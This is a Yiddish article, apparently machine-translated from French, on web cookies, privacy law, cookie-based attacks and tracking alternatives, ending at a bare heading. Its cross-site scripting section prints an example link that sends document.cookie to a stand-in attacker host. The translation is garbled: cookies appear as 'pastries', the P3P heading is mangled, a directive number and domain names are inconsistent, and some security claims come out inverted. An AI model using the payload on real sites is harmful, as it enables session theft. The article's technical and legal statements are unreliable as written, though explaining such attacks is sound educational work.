די פארייניקטע שטאַטן רעגירונג ימפּלאַמענאַד שטרענג כּללים אויף די פּלייסמאַנט פון קיכלעך אין 2000, נאָך עס איז געווען אנטפלעקט אַז די ווייסע הויז דראַג פּאָליטיק אָפפיסע איז געווען ניצן קיכלעך צו שפּור די קאָמפּיוטערס פון ניצערס וויוינג אָנליין מעדיצין אַדווערטייזמאַנץ. אין 2002, פּריוואַטקייט אַקטיוויסט דניאל בראַנדט דיסקאַווערד אַז די סי.איי.עי. לינקס פּערסיסטענט קיכלעך אויף קאָמפּיוטערס וואָס האָבן באזוכט זייַן וועבסיטעס. אַמאָל ינפאָרמד וועגן דעם בריטש, די סי.איי.עי. דערקלערט אַז די קיכלעך זענען נישט בכויוו געשיקט און אויפגעהערט שטעלן זיי. דעם 25סטן דעצעמבער 2005, האט בראנדט אנטדעקט אז די נאציאנאלע זיכערהייט אגענטור (NSA) האט איבערגעלאזט צוויי פערזענליכע קיכלעך אויף די קאמפיוטערס פון באזוכער צוליב א ווייכווארג אפדעיט. נאָך זיין נאָוטאַפייד, די NSA מיד פאַרקריפּלט קיכלעך.

אין די פֿאַראייניקטע מלכות, די קוקי געזעץ ", אריין אין קראַפט אויף מאי 25, 2012, אַבליידזשד די זייטלעך צו דערקלערן זייער ינטענטשאַנז, אַזוי אַלאַוינג די ניצערס צו קלייַבן צי זיי ווילן צו לאָזן שפּור אָדער נישט פון זייער דורכפאָר אויף אינטערנעט. זיי קענען אַזוי זיין פּראָטעקטעד פון גאַנצע טאַרגאַטינג. אָבער, לויט די גאַרדיאַן, די צושטימען פון אינטערנעט ניצערס איז ניט דאַווקע בפירוש; ענדערונגען האָבן שוין געמאכט צו די טערמינען פון באַניצער צושטימען, מאכן עס אַזוי ימפּלייד.

דירעקטיוו 2002/58 וועגן פּריוואַטקייט

דירעקטיוו 202/58 פּריוואַטקייט און עלעקטראָניש קאָמוניקאַציע, כּולל כּללים אויף די נוצן פון קיכלעך. אין באַזונדער, אַרטיקל 5, פּאַראַגראַף 3 פון דעם דירעקטיוו ריקווייערז אַז די סטאָרידזש פון דאַטן (אַזאַ ווי קיכלעך) אין די באַניצער 'ס קאָמפּיוטער קענען זיין געטאן בלויז אויב:

  • דער באַניצער איז ינפאָרמד וועגן ווי די דאַטן זענען געניצט;
  • דער באַניצער איז געגעבן די אָפּציע צו אָפּזאָגן דעם סטאָרידזש אָפּעראַציע. אָבער, דער אַרטיקל אויך זאגט אַז די סטאָרידזש פון דאַטן פֿאַר טעכניש סיבות איז פּאָטער פון דעם געזעץ.

לויט אַ באַריכט פון דעצעמבער 2003, וואָס איז געווען ימפּלאַמענאַד פֿון אקטאבער 2004, די דירעקטיוו איז אָבער בלויז זייער ימפּערפיקט אין פיר, וואָס אויך אנגעוויזן אַז עטלעכע מעמבער שטאַטן (סלאָוואַקיאַ, לאַטוויאַ, גריכנלאנד, בעלגיע און לוקסעמבאָורג) האָבן נישט נאָך טראַנספּאָסעד די דירעקטיוו אין דינער געזעץ.

לויט די מיינונג פון די G29 אין 2010, די דירעקטיוו, וואָס נאָוטאַבלי קאַנדישאַנינג די נוצן פון קיכלעך פֿאַר ביכייוויעראַל גאַנצע צוועקן, אויף די יקספּליסאַט צושטימען פון די אינטערנעט באַניצער איז זייער שוואַך געווענדט. אין פאַקט, רובֿ זייטלעך טאָן דאָס אין אַ וועג וואָס איז נישט נאָכקומען מיט די דירעקטיוו, דורך באַגרענעצן זיך צו אַ פּשוט "באַנער" מיט אינפֿאָרמאַציע וועגן די נוצן פון "קיכלעך" אָן געבן אינפֿאָרמאַציע אויף די ניצט, אָן דיפערענשייישאַן צווישן "טעכניש" קיכלעך. "טראַקינג" קיכלעך, אדער צו פאָרשלאָגן אַ פאַקטיש ברירה צו דער באַניצער וואָס וויל צו האַלטן טעכניש קיכלעך (אַזאַ ווי שאַפּינג וואָגן פאַרוואַלטונג קיכלעך) און אָפּזאָגן "טראַקינג" קיכלעך. אין פאַקט, פילע זייטלעך טאָן ניט פונקציאָנירן ריכטיק אויב קיכלעך זענען אפגעזאגט, וואָס טוט נישט נאָכקומען מיט דירעקטיוו 2002/58 אָדער דירעקטיוו 95/46 (שוץ פון פערזענלעכע דאַטן).

דירעקטיוו 2009 / 136 / CE

דער מאַטעריאַל איז דערהייַנטיקט דורך דירעקטיוו 2009/136/EC דייטיד 25 נאוועמבער 2009, וואָס זאגט אַז די "סטאָרידזש פון אינפֿאָרמאַציע, אָדער באַקומען אַקסעס צו אינפֿאָרמאַציע שוין סטאָרד, אין די וואָקזאַל ויסריכט פון אַ אַבאָנענט אָדער באַניצער איז דערלויבט בלויז אויף אַ צושטאַנד אַז אַבאָנענט אָדער באַניצער האט געגעבן זיין צושטימען, נאָך באקומען, אין לויט מיט דירעקטיוו 95/46/EC, קלאָר און פולשטענדיק אינפֿאָרמאַציע צווישן אנדערע וועגן די צוועקן פון די פּראַסעסינג. די נייַע דירעקטיוו דערפֿאַר סטרענגטאַנז די אַבלאַגיישאַנז איידער פּלייסינג קיכלעך אויף די קאָמפּיוטער פון די אינטערנעט באַניצער.

אין די פּרילימאַנערי קאַנסידעריישאַנז פון די דירעקטיוו, דער אייראפעישער לעגיסלאַטאָר ספּעציפיצירט אָבער: "וואו טעקניקלי מעגלעך און עפעקטיוו, אין לויט מיט די באַטייַטיק פּראַוויזשאַנז פון דירעקטיוו 95/46/EC, די צושטימען פון דער באַניצער מיט אַכטונג צו די פּראַסעסינג קען זיין אויסגעדריקט דורך די פּראַסעסינג. נוצן די צונעמען סעטטינגס פון אַ בלעטערער אָדער אנדערע אַפּלאַקיישאַן". אָבער אין פאַקט, קיין בלעטערער ביז איצט מאכט עס מעגלעך צו דיססאָסיאַטע די יקערדיק טעכניש קיכלעך פון די אַפּשאַנאַל אָנעס וואָס זאָל זיין לינקס צו דער באַניצער ס ברירה.

די נייַע דירעקטיוו איז טראַנספּאָסעד דורך בעלגיאַן מפּס אין יולי 2012. א 2014 לערנען ווייזט אַז אפילו מפּס געראַנגל צו צולייגן די קאַנסטריינץ פון די דירעקטיוו.

פּקסנומקספּ

די P3P באַשרייַבונג כולל די פיייקייט פֿאַר אַ סערווער צו זאָגן אַ פּריוואַטקייט פּאָליטיק, וואָס דיפיינז וואָס סאָרט פון אינפֿאָרמאַציע עס קאַלעקץ און פֿאַר וואָס ציל. די פּאַלאַסיז אַרייַננעמען (אָבער זענען נישט לימיטעד צו) די נוצן פון אינפֿאָרמאַציע געזאמלט ניצן קיכלעך. לויט די דעפֿיניציע פון ​​P3P, אַ בלעטערער קענען אָננעמען אָדער אָפּוואַרפן קיכלעך דורך קאַמפּערינג די פּריוואַטקייט פּאַלאַסיז מיט די פּרעפֿערענצן פון דער באַניצער אָדער דורך אַסקינג דעם באַניצער, פּרעזענטינג די פּריוואַטקייט פּאָליטיק פּריוואַטקייט דערקלערונג דערקלערט דורך די סערווער.

פילע בראַוזערז, אַרייַנגערעכנט עפּל סאַפאַרי און מיקראָסאָפט Internet Explorer ווערסיעס 6 און 7, שטיצן P3P וואָס אַלאַוז דער בלעטערער צו באַשליסן צי צו אָננעמען דריט פּאַרטיי קיכל סטאָרידזש. דער אָפּעראַ בלעטערער אַלאַוז ניצערס צו אָפּזאָגן דריט-פּאַרטיי קיכלעך און צו שאַפֿן אַ גלאבאלע און ספּעציפיש זיכערהייט פּראָפיל פֿאַר אינטערנעט דאָומיינז. מאָזיללאַ פירעפאָקס ווערסיע 2 דראַפּט P3P שטיצן אָבער ריינסטייטיד עס אין ווערסיע 3.

דריט-פּאַרטיי קיכלעך קענען זיין אפגעשטעלט דורך רובֿ בראַוזערז צו פאַרגרעסערן פּריוואַטקייט און רעדוצירן אַד טראַקינג, אָן נעגאַטיוו פּראַל אויף דער באַניצער 'ס וועב דערפאַרונג. פילע גאַנצע יידזשאַנסיז פאָרשלאָגן אַן אָפּציע אָפּטאָן צו טאַרגעטעד גאַנצע, דורך באַשטעטיקן אַ דזשאַנעריק קיכל אין דעם בלעטערער וואָס דיאַקטיווייץ דעם טאַרגאַטינג, אָבער אַזאַ אַ לייזונג איז נישט פּראַקטאַקלי עפעקטיוו ווען עס איז רעספּעקטעד, ווייַל די דזשאַנעריק קיכל איז ירייסט ווי באַלד ווי דער באַניצער ויסמעקן די קיכלעך וואָס קאַנסאַלז די אַפּט אויס באַשלוס.

דיסאַדוואַנטידזשיז פון קיכלעך

אין אַדישאַן צו פּריוואַטקייט ישוז, קיכלעך אויך האָבן עטלעכע טעכניש דראָבאַקס. אין באַזונדער, זיי טאָן ניט שטענדיק אַקיעראַטלי ידענטיפיצירן ניצערס, זיי קענען פּאַמעלעך די פאָרשטעלונג פון די פּלאַץ אין גרויס נומערן, זיי קענען זיין געוויינט פֿאַר זיכערהייט אנפאלן, און זיי קאָנפליקט מיט די רעפּריזענאַטיוו שטאַט אַריבערפירן, אַרקאַטעקטשעראַל נוסח פון די ווייכווארג.

ומפּינקטלעך לעגיטימאַציע

אויב מער ווי איין בלעטערער איז געניצט אויף אַ קאָמפּיוטער, אין יעדער פון זיי עס איז שטענדיק אַ באַזונדער סטאָרידזש אַפּאַראַט פֿאַר קיכלעך. קיכלעך דעריבער טאָן ניט ידענטיפיצירן אַ מענטש, אָבער די קאָמבינאַציע פון ​​אַ באַניצער חשבון, אַ קאָמפּיוטער און אַ וועב בלעטערער. אזוי, ווער עס יז קענען נוצן די אַקאַונץ, קאָמפּיוטערס אָדער בראַוזערז וואָס האָבן די פּאַנאָפּלי פון קיכלעך. סימילאַרלי, קיכלעך טאָן ניט דיפערענשיייט צווישן קייפל יוזערז וואָס טיילן די זעלבע באַניצער חשבון, קאָמפּיוטער און בלעטערער, ​​אַזאַ ווי אין "אינטערנעט קאַפעס" אָדער קיין אָרט וואָס גיט פריי אַקסעס צו קאָמפּיוטער רעסורסן.

אבער אין פראקטיש קומט די סטעיטמענט אויס ווי פאלש אין רוב פאלן ווייל היינט ווערט א "פערזענליכע" קאמפיוטער (אדער א סמארטפון, אדער טאבלעט, וואס איז ערגער) גענוצט דער עיקר דורך איין יחיד. דורך דעם באַנד פון אינפֿאָרמאַציע געזאמלט קומען צו פערזענליכען טאַרגאַטינג אפילו אויב דער מענטש איז נישט "ניימלי" יידענאַפייד.

א קיכל קענען זיין סטאָלען דורך אן אנדער קאָמפּיוטער אויף די נעץ.

בעשאַס נאָרמאַל אָפּעראַציע, קיכלעך זענען געשיקט צוריק צווישן די סערווער (אָדער אַ גרופּע פון ​​סערווערס אין דער זעלביקער פעלד) און די באַניצער 'ס קאָמפּיוטער בלעטערער. זינט קיכלעך קענען אַנטהאַלטן שפּירעוודיק אינפֿאָרמאַציע (באַניצער נאָמען, אַ פּאַראָל געניצט פֿאַר אָטענטאַקיישאַן, אאז"ו ו), זייער וואַלועס זאָל נישט זיין צוטריטלעך צו אנדערע קאָמפּיוטערס. קיכל גנייווע איז אַן אַקט פון ינטערסעפּשאַן פון קיכלעך דורך אַן אַנאָטערייזד דריט פּאַרטיי.

קיכלעך קענען זיין סטאָלען דורך אַ פּאַקאַט סניפער אין אַ באַפאַלן גערופן סעסיע כיידזשאַקינג. פאַרקער אויף דער נעץ קענען זיין ינטערסעפּטאַד און לייענען דורך קאָמפּיוטערס אנדערע ווי די שיקט און ריסיווינג (ספּעציעל אויף די אַנענקריפּטעד עפנטלעך Wi-Fi פּלאַץ). דער פאַרקער כולל קיכלעך געשיקט איבער סעשאַנז ניצן די קלאָר הטטפּ פּראָטאָקאָל. ווען נעץ פאַרקער איז נישט ינקריפּטיד, בייזע יוזערז קענען אַזוי לייענען די קאָמוניקאַציע פון ​​אנדערע ניצערס אויף די נעץ ניצן "פּאַקקעט סניפערז".

דעם פּראָבלעם קענען זיין באַקומען דורך ענקריפּטינג די קשר צווישן די באַניצער 'ס קאָמפּיוטער און די סערווער ניצן די HTTPS פּראָטאָקאָל. א סערווער קענען ספּעציפיצירן אַ זיכער פאָן בשעת באַשטעטיקן אַ קיכל; דער בלעטערער וועט שיקן עס בלויז איבער אַ זיכער שורה, אַזאַ ווי אַ SSL פֿאַרבינדונג.

אָבער פילע זייטלעך, כאָטש ניצן HTTPS ינקריפּטיד קאָמוניקאַציע פֿאַר באַניצער אָטענטאַקיישאַן (ד"ה די לאָגין בלאַט), שפּעטער שיקן סעסיע קיכלעך און אנדערע דאַטן ווי נאָרמאַל, דורך אַנענקריפּטיד הטטפּ קאַנעקשאַנז פֿאַר עפעקטיוו סיבות. אַטאַקערז קענען אַזוי ינטערסעפּט אנדערע יוזערז 'קיכלעך און ימפּערסאַנייט זיי אויף צונעמען זייטלעך אָדער נוצן זיי אין קיכל אנפאלן.

סקריפּטינג אין דעם פּלאַץ: אַ קיכל וואָס זאָל נאָר זיין פארביטן צווישן די סערווער און דער קליענט איז געשיקט צו אן אנדער דריט פּאַרטיי.

אן אנדער וועג צו גאַנווענען קיכלעך איז צו סקריפּט זייטלעך און לאָזן דעם בלעטערער זיך שיקן קיכלעך צו בייזע סערווערס וואָס קיינמאָל באַקומען זיי. מאָדערן בראַוזערז לאָזן דורכפירונג פון געזוכט פּאַרץ פון קאָד פון די סערווער. אויב קיכלעך זענען אַקסעסט בעשאַס רונטימע, זייער וואַלועס קען זיין קאַמיונאַקייטיד אין עטלעכע פאָרעם צו סערווערס וואָס זאָל נישט אַקסעס זיי. ענקריפּטינג קיכלעך איידער זיי זענען געשיקט איבער די נעץ טוט נישט העלפן טוואָרט די באַפאַלן.

דעם טיפּ פון סקריפּטינג אין פּלאַץ איז טיפּיקלי אָנגעשטעלט דורך אַטאַקערז אויף זייטלעך וואָס לאָזן ניצערס צו פּאָסטן HTML אינהאַלט. דורך ינטאַגרייטינג אַ טייל פון קאַמפּאַטאַבאַל קאָד אין די HTML צושטייַער, אַ אַטאַקער קענען באַקומען קיכלעך פון אנדערע ניצערס. וויסן פון די קיכלעך קענען ווערן גענוצט דורך קאַנעקטינג צו דער זעלביקער פּלאַץ ניצן די סטאָלען קיכלעך, אַזוי זיין אנערקענט ווי דער באַניצער וועמענס קיכלעך זענען סטאָלען.

איין וועג צו פאַרמייַדן אַזאַ אנפאלן איז צו נוצן די HttpOnly פאָן; עס איז אַן אָפּציע, באַקענענ זינט ווערסיע 6 פון Internet Explorer אין PHP זינט ווערסיע 5.2.0 וואָס איז פּלאַננעד צו מאַכן די קיכל ינאַקסעסאַבאַל צו דעם קליענט נאָענט צו די שריפט. אָבער, וועב דעוועלאָפּערס זאָל נעמען דעם אין חשבון אין זייער פּלאַץ אַנטוויקלונג אַזוי אַז זיי זענען ימיון צו סקריפּטינג אויף דעם פּלאַץ.

אן אנדער זיכערהייט סאַקאָנע געניצט איז פאָדערונג פאַבריקיישאַן אין דעם פּלאַץ.

דער באַאַמטער טעכניש ספּעסאַפאַקיישאַן אַלאַוז קיכלעך צו זיין געשיקט צוריק בלויז צו סערווערס אין די פעלד פון וואָס זיי ערידזשאַנייטאַד. אָבער, די ווערט פון קיכלעך קענען זיין געשיקט צו אנדערע סערווערס מיט אנדערע מיטל ווי קיכל כעדערז.

אין באַזונדער, סקריפּטינג שפּראַכן ווי דזשאַוואַסקריפּט זענען בכלל ערלויבט צו אַקסעס קיכל וואַלועס און זענען ביכולת צו שיקן אַרביטראַריש וואַלועס צו קיין סערווער אויף דער אינטערנעץ. די סקריפּטינג פיייקייט איז געניצט פֿון וועבסיטעס אַלאַוינג יוזערז צו פּאָסטן HTML אינהאַלט פֿאַר אנדערע ניצערס צו זען.

פֿאַר בייַשפּיל, אַ אַטאַקער אַפּערייטינג אויף די example.com פעלד קען פּאָסטן אַ באַמערקונג מיט די פאלגענדע לינק ווייזן צו אַ פאָלקס בלאָג וואָס זיי אַנדערש טאָן ניט קאָנטראָלירן:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

ווען אן אנדער באַניצער קליקט אויף דעם לינק, דער בלעטערער עקסאַקיוץ די אָנקליק אַטריביוט טייל פון די קאָד, אַזוי עס ריפּלייסיז די document.cookie שטריקל מיט דער רשימה פון באַניצער קיכלעך וואָס זענען אַקטיוו פֿאַר דעם בלאַט. דעריבער, די רשימה פון קיכלעך איז געשיקט צו די example.com סערווער, און דער אַטאַקער איז ביכולת צו זאַמלען די קיכלעך פון דעם באַניצער.

דעם טיפּ פון באַפאַלן איז שווער צו דעטעקט אויף דער באַניצער זייַט ווייַל די שריפט קומט פון דער זעלביקער פעלד וואָס שטעלן די קיכל, און די אָפּעראַציע צו שיקן די וואַלועס איז אָטערייזד דורך דעם פעלד. עס איז באַטראַכט אַז עס איז די פֿאַראַנטוואָרטלעכקייט פון די אַדמיניסטראַטאָרס אַפּערייטינג דעם טיפּ פון פּלאַץ צו שטעלן ריסטריקשאַנז וואָס פּרעווענטינג די ויסגאַבע פון ​​בייזע קאָד.

קאָאָקיעס זענען נישט גלייך קענטיק צו קליענט-זייַט מגילה ווי דזשאַוואַסקריפּט אויב זיי זענען געשיקט מיט די HttpOnly פאָן. פֿון די סערווער ס פונט פון מיינונג, דער בלויז חילוק איז אַז אין די שורה פון די סעט-קיכל כעדער, עס איז צוגעגעבן אַ נייַ פעלד מיט די שטריקל HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

ווען דער בלעטערער נעמט אַזאַ אַ קיכל, עס איז געמיינט צו נוצן עס נאָרמאַלי אין די פאלגענדע הטטפּ וועקסל, אָבער אָן מאכן עס קענטיק צו סקריפּס עקסאַקיוטאַד אויף די קליענט זייַט. די HttpOnly פאָן איז נישט אַ טייל פון קיין באַאַמטער טעכניש ספּעסאַפאַקיישאַנז און איז נישט ימפּלאַמענאַד אין אַלע בראַוזערז. באַמערקונג אַז עס איז דערווייַל קיין וועג צו פאַרמייַדן די לייענען און שרייבן פון סעסיע קיכלעך דורך די XMLHTTPrequest אופֿן.

מאָדיפיקאַטיאָן פון אינהאַלט: אַ אַטאַקער סענדז אַ פאַרקריפּלט קיכל צו אַ סערווער, עפשער געמאכט פון אַ גילטיק קיכל געשיקט דורך די סערווער.

ווי באַלד ווי די קיכלעך דאַרפֿן צו זיין סטאָרד און אומגעקערט אַנטשיינדזשד צו די סערווער, אַ אַטאַקער קענען מאָדיפיצירן די ווערט פון די קיכלעך איידער זיי זענען געשיקט צוריק צו די סערווער. צום ביישפּיל, אויב אַ קיכל כּולל די גאַנץ ווערט וואָס דער באַניצער דאַרף באַצאָלן פֿאַר די זאכן וואָס זענען געשטעלט אין די שאַפּינג וואָגן פון די קראָם, טשאַנגינג דעם ווערט יקספּאָוזיז די סערווער צו די ריזיקירן פון טשאַרדזשינג די אַטאַקער ווייניקער ווי די סטאַרטינג פּרייַז. דער פּראָצעס פון מאַדאַפייינג די ווערט פון קיכלעך איז גערופן קיכל פאַרסאַמונג און קענען זיין געוויינט נאָך קיכל גנייווע צו מאַכן די באַפאַלן פּערסיסטענט.

אין די קיכל אָווועררייד אופֿן, די אַטאַקער עקספּלויץ אַ בלעטערער גליטש צו שיקן אַ פאַרקריפּלט קיכל צו די סערווער.

רובֿ וועבסיטעס, אָבער, בלויז קראָם אַ סעסיע שייַן - אַ ראַנדאַמלי דזשענערייטאַד יינציק נומער געניצט צו ידענטיפיצירן די סעסיע באַניצער - אין די קיכל זיך, בשעת אַלע אנדערע אינפֿאָרמאַציע איז סטאָרד אויף די סערווער. אין דעם פאַל, דעם פּראָבלעם איז לאַרגעלי סאַלווד.

יעדער פּלאַץ איז געריכט צו האָבן זיין אייגענע קיכלעך, אַזוי איין פּלאַץ זאָל נישט קענען צו מאָדיפיצירן אָדער שאַפֿן קיכלעך פֿאַרבונדן מיט אן אנדער פּלאַץ. א וועב בלעטערער זיכערהייט פלאָ קענען לאָזן בייזע זייטלעך צו ברעכן דעם הערשן. די עקספּלויטיישאַן פון אַזאַ אַ פלאָ איז קאַמאַנלי ריפערד צו ווי קרייַז-פּלאַץ קוקינג. דער ציל פון אַזאַ אנפאלן קען זיין סעסיע שייַן גנייווע.

יוזערז זאָל נוצן די לעצטע ווערסיעס פון וועב בראַוזערז אין וואָס די וואַלנעראַביליטיז זענען כמעט ילימאַנייטאַד.

קאַנפליקטינג שטאַט צווישן קליענט און סערווער

די נוצן פון קיכלעך קען דזשענערייט אַ סטירע צווישן די שטאַט פון דעם קליענט און די שטאַט סטאָרד אין די קיכל. אויב דער באַניצער אַקווייערז אַ קיכל און גיט אויף די "צוריק" קנעפּל פון דעם בלעטערער, ​​די שטאַט פון דעם בלעטערער איז בכלל נישט די זעלבע ווי איידער די אַקוואַזישאַן. צום ביישפּיל, אויב דער קאָרב פון אַן אָנליין קראָם איז באשאפן מיט קיכלעך, דער אינהאַלט פון די קאָרב קען נישט טוישן ווען דער באַניצער קערט צו די בלעטערער געשיכטע: אויב דער באַניצער דריקן אַ קנעפּל צו לייגן אַ אַרטיקל אין זיין קאָרב און גיט אויף די "צוריקקומען". " קנעפּל, דער אַרטיקל בלייבט אין דעם איין. דאָס קען נישט זיין די כוונה פון דער באַניצער, וואָס אַוואַדע וויל צו באָטל מאַכן די דערצו פון דעם אַרטיקל. דאָס קען פירן צו אַנרילייאַביליטי, צעמישונג און באַגז. אַזוי וועב דעוועלאָפּערס זאָל זיין אַווער פון דעם פּראָבלעם און ינסטרומענט מיטלען צו שעפּן סיטואַטיאָנס ווי דעם.

פּערסיסטענט קיכלעך האָבן שוין קריטיקירט דורך פּריוואַטקייט זיכערהייט עקספּערץ פֿאַר ניט זיין באַשטימט צו ויסגיין באַלד גענוג, דערמיט אַלאַוינג וועבסיטעס צו שפּור יוזערז און בויען זייער פּראָפיל איבער צייַט. דער אַספּעקט פון קיכלעך איז אויך טייל פון די סעסיע כיידזשאַקינג פּראָבלעם, ווייַל אַ סטאָלען פּערסיסטענט קיכל קענען ווערן גענוצט צו ימפּערסאַנייט אַ באַניצער פֿאַר אַ היפּש צייט.

צו לייענען אויך: GAFAM: ווער זענען זיי? פארוואס זענען זיי (מאל) אַזוי סקערי?

אַלטערנאַטיוועס צו קיכלעך

עטלעכע אַפּעריישאַנז וואָס קענען זיין דורכגעקאָכט מיט קיכלעך קענען אויך זיין דורכגעקאָכט מיט אנדערע מעקאַניזאַמז וואָס בייפּאַס קיכלעך אָדער ריקריייט אויסגעמעקט קיכלעך, וואָס קריייץ פּריוואַטקייט ישוז אין דער זעלביקער וועג (אָדער מאל ערגער ווייַל דעמאָלט ומזעיק) ווי קיכלעך.

IP אַדרעס

יוזערז קענען זיין טראַקט מיט די IP אַדרעס פון די קאָמפּיוטער וואָס רופן דעם בלאַט. די טעכניק איז בנימצא זינט די הקדמה פון די וועלט ווידע וועב, ווי בלעטער זענען דאַונלאָודיד, דער סערווער ריקוועס די IP אַדרעס פון די קאָמפּיוטער מיט דעם בלעטערער אָדער פּראַקסי, אויב קיינער איז נישט געניצט. דער סערווער קענען שפּור דעם אינפֿאָרמאַציע צי עס זענען קיכלעך אין נוצן אָדער נישט. אָבער, די אַדרעסעס זענען טיפּיקלי ווייניקער פאַרלאָזלעך אין יידענטאַפייינג אַ באַניצער ווי קיכלעך ווייַל קאָמפּיוטערס און פּראַקסיז קען זיין שערד דורך קייפל ניצערס, און דער זעלביקער קאָמפּיוטער קען באַקומען אַ אַנדערש IP אַדרעס אויף יעדער אַרבעט סעסיע (אַזאַ ווי אָפט די פאַל פֿאַר טעלעפאָן קאַנעקשאַנז) .

טראַקינג דורך IP אַדרעסעס קענען זיין פאַרלאָזלעך אין עטלעכע סיטואַטיאָנס, אַזאַ ווי בראָדבאַנד קאַנעקשאַנז וואָס האַלטן די זעלבע IP אַדרעס פֿאַר אַ לאַנג צייַט, אַזוי לאַנג ווי די מאַכט איז אויף.

עטלעכע סיסטעמען ווי טאָר זענען דיזיינד צו האַלטן די אַנאָנימיטי פון די אינטערנעט און מאַכן טראַקינג דורך IP אַדרעס אוממעגלעך אָדער ימפּראַקטאַקאַל.

URL

א מער גענוי טעכניק איז באזירט אויף עמבעדדינג אינפֿאָרמאַציע אין URL ס. דער אָנפרעג שטריקל טייל פון די URL איז איין טעכניק וואָס איז טיפּיקלי געניצט פֿאַר דעם צוועק, אָבער אנדערע פּאַרץ קענען זיין געוויינט אויך. ביידע די Java סערווערלעט און די PHP סעסיע מעקאַניזאַמז נוצן דעם אופֿן אויב קיכלעך זענען נישט ענייבאַלד.

דער אופֿן ינוואַלווז די וועב סערווער אַדינג שטריקל ריקוועס צו די לינקס פון די וועב בלאַט וואָס קאַריז עס ווען עס איז געשיקט צו דעם בלעטערער. ווען דער באַניצער גייט אַ לינק, דער בלעטערער קערט די אַטאַטשט אָנפֿרעג שטריקל צו די סערווער.

אָנפֿרעג סטרינגס געניצט פֿאַר דעם צוועק און קיכלעך זענען זייער ענלעך, ביידע די אינפֿאָרמאַציע אַרביטרעראַלי אויסדערוויילט דורך די סערווער און אומגעקערט דורך דעם בלעטערער. אָבער, עס זענען עטלעכע דיפעראַנסיז: ווען אַ URL מיט אַ אָנפֿרעג שטריקל איז ריוזד, די זעלבע אינפֿאָרמאַציע איז געשיקט צו די סערווער. פֿאַר בייַשפּיל, אויב די פּרעפֿערענצן פון אַ באַניצער זענען קאָדעד אין אַ אָנפֿרעג שטריקל פון אַ URL און דער באַניצער סענדז די URL צו אן אנדער באַניצער דורך E- בריוו, דער באַניצער וועט אויך קענען צו נוצן די פּרעפֿערענצן.

אויף די אנדערע האַנט, ווען אַ באַניצער אַקסעס די זעלבע בלאַט צוויי מאָל, עס איז קיין גאַראַנטירן אַז די זעלבע אָנפֿרעג שטריקל וועט זיין געוויינט ביידע מאָל. צום ביישפּיל, אויב אַ באַניצער לאַנדיד אויף אַ בלאַט פון אַן ינערלעך פּלאַץ בלאַט די ערשטער מאָל און לאַנדיד אויף דער זעלביקער בלאַט פון אַ פונדרויסנדיק בלאַט די צווייט מאָל, די אָנפֿרעג שטריקל קאָרעוו צו די פּלאַץ בלאַט איז טיפּיקלי אַנדערש, בשעת די קיכלעך זענען די זעלבע .

אנדערע דיסאַדוואַנטידזשיז פון אָנפֿרעג סטרינגס זענען שייַכות צו זיכערהייט: בעכעסקעם דאַטן וואָס יידענאַפייד אַ סעסיע אין אָנפֿרעג סטרינגס ינייבאַלז אָדער סימפּלאַפייז סעסיע פיקסיישאַן אנפאלן, אידענטיטעט רעפֿערענץ אנפאלן און אנדערע עקספּלויץ. פאָרן סעסיע ידס ווי הטטפּ קיכלעך איז מער זיכער.

פאַרבאָרגן פאָרעם פעלד

איין פאָרעם פון סעסיע טראַקינג, געניצט דורך ASP.NET, איז צו נוצן וועב פארמען מיט פאַרבאָרגן פעלדער. די טעכניק איז זייער ענלעך צו ניצן URL אָנפֿרעג סטרינגס צו פירן אינפֿאָרמאַציע און האט די זעלבע אַדוואַנטידזשיז און דיסאַדוואַנטידזשיז; און אויב די פאָרעם איז פּראַסעסט מיט די HTTP GET אופֿן, די פעלדער אַקשלי ווערן טייל פון די URL פון דעם בלעטערער וואָס וועט שיקן עס ווען איר פאָרלייגן די פאָרעם. אָבער רובֿ פארמען זענען פּראַסעסט מיט HTTP POST, וואָס מאכט די פאָרעם אינפֿאָרמאַציע, אַרייַנגערעכנט פאַרבאָרגן פעלדער, צו זיין צוגעגעבן ווי אַן נאָך אַרייַנשרייַב וואָס איז ניט טייל פון די URL אָדער אַ קיכל.

דער צוגאַנג האט צוויי אַדוואַנטידזשיז פון אַ טראַקינג פּערספּעקטיוו: ערשטער, טראַקינג די אינפֿאָרמאַציע געשטעלט אין די HTML מקור קאָד און POST אַרייַנשרייַב אלא ווי די URL וועט לאָזן די דורכשניטלעך באַניצער צו ויסמיידן דעם טראַקינג; רגע, די סעסיע אינפֿאָרמאַציע איז נישט קאַפּיד ווען דער באַניצער קאַפּיז די URL (צו ראַטעווען די בלאַט צו דיסק אָדער שיקן עס דורך E- בריוו, פֿאַר בייַשפּיל).

פֿענצטער.נאָמען

אַלע פּראָסט וועב בראַוזערז קענען קראָם גאַנץ אַ גרויס סומע פון ​​דאַטן (2MB צו 32MB) דורך דזשאַוואַסקריפּט ניצן די DOM ס ווינדאָוו.נאַמע פאַרמאָג. די דאַטן קענען זיין געוויינט אַנשטאָט פון סעסיע קיכלעך און איז אויך געניצט אַריבער דאָומיינז. די טעכניק קענען זיין קאַפּאַלד מיט JSON אַבדזשעקץ צו קראָם אַ קאָמפּלעקס גאַנג פון סעסיע וועריאַבאַלז פון קליענט זייַט.

די דאַונסייד איז אַז יעדער באַזונדער פֿענצטער אָדער קוויטל וועט טכילעס האָבן אַ ליידיק פֿענצטער.נאַמע; ווען איר בלעטער דורך טאַבס (געעפֿנט דורך די באַניצער) דאָס מיטל אַז די טאַבס וואָס זענען געעפנט ינדיווידזשואַלי וועט נישט האָבן אַ פֿענצטער נאָמען. אַדישנאַלי, ווינדאָוו.נאַמע קענען ווערן גענוצט צו שפּור וויזאַטערז אויף פאַרשידענע זייטלעך וואָס קענען אָנמאַכן אַ פּריוואַטקייט דייַגע.

אין עטלעכע רעספּעקט, דאָס קען זיין מער זיכער ווי קיכלעך, רעכט צו דער ניט-ינוואַלוויישאַן פון די סערווער, אַזוי עס איז ינוואַלנעראַבאַל פֿאַר די נעץ באַפאַלן פון סניפערז קיכלעך. אָבער, אויב ספּעציעל מיטלען זענען גענומען צו באַשיצן די דאַטן, עס איז שפּירעוודיק צו ווייַטער אנפאלן, ווייַל די דאַטן זענען בנימצא דורך אנדערע זייטלעך געעפנט אין די זעלבע פֿענצטער.

הטטפּ אָטענטאַקיישאַן

